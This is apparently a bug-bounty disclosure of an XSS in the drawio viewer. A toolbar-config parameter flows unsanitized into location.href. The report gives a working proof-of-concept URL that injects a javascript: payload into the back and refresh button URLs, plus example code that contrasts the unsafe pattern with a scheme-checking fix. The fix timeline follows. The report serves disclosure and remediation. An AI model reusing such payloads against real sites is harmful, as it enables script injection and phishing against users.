XSS at https://viewer.diagrams.net/ in jgraph/drawio

Valid

Reported on

Sep 5th 2022


Description

The application takes a URL for the refresh and back buttons from a request parameter and assigns it to location.href without sanitizing it.

Proof of Concept

Go to:

https://viewer.diagrams.net/index.html?tags=%7B%7D&highlight=0000ff&&layers=1&nav=1&toolbar=1&toolbar-config=%7B%22backBtn%22:%7B%22url%22:%22javascript:alert(document.domain)%22%7D,%22refreshBtn%22:%7B%22url%22:%22javascript:alert(document.domain)%22%7D%7D&title=xss.drawio#RdZNdb9sgFIZ%2FjaXtopUDTdZdxkmbatI2TVnVa2qoTQscD%2BPa6a%2FfIYA%2F1lWyZHjOy%2FnikNGdHg6WNfV34EJlJOdDRvcZIasrQjL%2F5fwUCF1HUFnJo2gCR%2FkmIswj7SQX7ULoAJSTzRKWYIwo3YIxa6Ffyp5ALaM2rBLvwLFk6j19kNzVgV6TLxO%2FE7KqU%2BTV5muwaJbEsZK2Zhz6GaI3Gd1ZABdWetgJ5ZuX%2BhLO3X5gHROzwrj%2FHLhvhf35%2BOx7QnLFHvFezqKMbBTqiycw3tK6Uyx186eDZLhozxexRcE6b%2FAyi8mOq8r%2Ff4vBJWcYNfgLppCakuYlxHxmr6wtrWzQuF1sfLr%2BW%2BcMW27dJw5lp7GiSw6aSfM5uEpFr39ct923fP9r%2F3ab3w2H432nL1ZjM8cmTVUR59OkRe20b8AKl62z8CJ2oMAiMWCEr1oq9Q9iSlYGtyWmI5AXr5igxNHYRoOWnPswRV9LJ44NK33MHh8CMgud4cLnnY8d8Q7E8OH9zQs5CNDC2RNK4gFK4yDFl0Q2cd9Pc5lQPRvJdIzFl1CNnqdhwUXsXdrOxiehaVTP8tmDpzd%2FAQ%3D%3D

Click the refresh or back icon on the toolbar.
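The unsanitized assignment described above, with a scheme check beside it, as an added example that is not drawio's code and not the fix shipped in 20.3.0. The `toolbar-config` JSON shape (`backBtn.url`, `refreshBtn.url`) is taken from the proof-of-concept URL; the base origin and function names are assumptions.

```javascript
// Added example (not drawio's code): parse a toolbar-config parameter and
// only hand a URL to a navigation sink (location.href) when its scheme is
// http or https. Any other scheme, including javascript:, is rejected.

// Constructed sample mirroring the toolbar-config value in the report.
const MALICIOUS_TOOLBAR_CONFIG = JSON.stringify({
  backBtn: { url: 'javascript:alert(document.domain)' },
  refreshBtn: { url: 'javascript:alert(document.domain)' },
});

// Constructed benign sample: an absolute URL and a relative path.
const BENIGN_TOOLBAR_CONFIG = JSON.stringify({
  backBtn: { url: 'https://example.com/diagrams/' },
  refreshBtn: { url: '/index.html?nav=1' },
});

// Vulnerable pattern: the parameter value flows straight to the sink.
function unsafeButtonUrl(toolbarConfigParam, buttonName) {
  const config = JSON.parse(toolbarConfigParam);
  return config[buttonName] != null ? config[buttonName].url : null;
}

// Hardened pattern: resolve the value against the viewer's origin with the
// URL parser and allow only http(s). The WHATWG parser strips leading
// whitespace and embedded tabs/newlines and lowercases the scheme, so
// variants such as " JAVASCRIPT:" or "java\tscript:" still end up rejected.
function safeButtonUrl(toolbarConfigParam, buttonName, base = 'https://viewer.diagrams.net/') {
  let config;
  try {
    config = JSON.parse(toolbarConfigParam);
  } catch (e) {
    return null; // malformed config: keep the button's default behaviour
  }
  const raw = config && config[buttonName] && config[buttonName].url;
  if (typeof raw !== 'string') return null;
  let parsed;
  try {
    parsed = new URL(raw, base);
  } catch (e) {
    return null; // unparseable value: do not navigate
  }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return null;
  return parsed.href; // normalised absolute URL, safe to assign to location.href
}
```

The caller should assign only the return value of `safeButtonUrl` to `location.href` and leave the button inert when it returns null.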

Impact

XSS, phishing

We are processing your report and will contact the jgraph/drawio team within 24 hours. 3 months ago
David Benson validated this vulnerability 3 months ago
Joao Vitor Maia has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
David Benson marked this as fixed in 20.3.0 with commit b5dfeb 3 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
EditorUi.js#L2555 has been validated
EditorUi.js#L2819 has been validated